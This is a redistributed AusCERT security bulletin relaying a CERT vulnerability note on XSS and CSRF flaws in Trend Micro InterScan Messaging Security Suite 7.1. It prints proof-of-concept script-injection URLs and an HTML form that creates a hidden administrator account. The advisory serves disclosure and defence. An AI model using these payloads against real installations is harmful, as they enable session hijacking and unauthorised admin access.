-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2012.0893
       Trend Micro InterScan Messaging Security Suite is vulnerable
                      to XSS and CSRF vulnerabilities
                             18 September 2012

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Trend Micro InterScan Messaging Security Suite
Publisher:         US-CERT
Operating System:  Windows
                   Linux variants
                   Solaris
Impact/Access:     Cross-site Request Forgery -- Remote with User Interaction
                   Cross-site Scripting       -- Remote with User Interaction
Resolution:        Mitigation
CVE Names:         CVE-2012-2996 CVE-2012-2995 

Original Bulletin: 
   http://www.kb.cert.org/vuls/id/471364

- --------------------------BEGIN INCLUDED TEXT--------------------

Vulnerability Note VU#471364
Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF 
vulnerabilities

Original Release date: 13 Sep 2012 | Last revised: 14 Sep 2012

Overview

Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 
has been reported to be susceptible to cross-site scripting and cross-site 
request forgery vulnerabilities.

Description

Trend Micro InterScan Messaging Security Suite is susceptible to cross-site 
scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

Impact

An unauthenticated attacker may be able to execute arbitrary script in the 
context of a logged in user's session.

Solution

We are currently unaware of a practical solution to this problem. Please 
consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts 
and networks. Restricting access would prevent an attacker from accessing the 
InterScan Messaging Security Suite using stolen credentials from a blocked 
network location.

Vendor Information (Learn More)
Vendor		Status		Date Notified	Date Updated
Trend Micro	Affected	10 Aug 2012	12 Sep 2012

If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)
Group 		Score 	Vector
Base 		6.8 	AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal 	5.5 	E:POC/RL:U/RC:UC
Environmental 	5.5 	CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

    http://cwe.mitre.org/data/definitions/352.html
    http://cwe.mitre.org/data/definitions/79.html
    http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

Credit

Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

    CVE IDs: CVE-2012-2995 CVE-2012-2996
    Date Public: 13 Sep 2012
    Date First Published: 13 Sep 2012
    Date Last Updated: 14 Sep 2012
    Document Revision: 14

Feedback

If you have feedback, comments, or additional information about this 
vulnerability, please send us email.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBUFf0BO4yVqjM2NGpAQJjaRAAlqLf6mxcgLiuH0Xmq8iD+1ljYfyycGVK
08HJp9O9z9IW8oYjDGWtWT7KGLR9ZEA+q9SZt+PocZHfKtCuVW6lOWKbA1OsVXcA
VpdeBJmW2Tln5zolV4qKi7sTKP2TU5QH0+AYA1JqhEoW/CB5Jyh0JsjxdXc59ViI
yyW+qeHZ2SLHChT1SYAFLxAu8g6nipscdlt2IzzrGj4fYeiU6xVDPG0XLC8ny5Zn
nNdPEr+i+rP4LqcSjxynce3kBoMgisoiGkc43SiKKCUSjCkCq+I2Sy7QnC2aNBgp
5Wy3nT5OM9WWsZZnwPADtoOTJPDfwrUa9Qbg+iyGgN4d3ivywuupJFMtTBw2IMVA
k29c5C1pZ7KRZeefX0WIywZsa2o2r2RqRASAYT+TLbWh+fUMw1Pv7oKce8ohTFkv
7iC9Gp7b2wtH1M4ZWfEz0gNqGWzWCiW3gdCjZI9FyfE2+5kkoIzn6c34lOpWqRwl
2X4O44O51S7sgTejXZw5vokZb4WExHp7sNUtcNqiHuXdgT9OabwYQhhFZmH9tjMu
3QMDCH7GS0qsekRl6ntK5QV9bPSbdu7j1Mnw3WPvdIIgVSv9Z0iAV8Ebch+p4rSV
PQt+Vus6b4bp+Ty2Fi3yyx+1IfLS7K2ijshDXeTZf0uFj+L8kvVDU6Yi+wEJEqZB
Hr1snQFl2T0=
=vX7X
-----END PGP SIGNATURE-----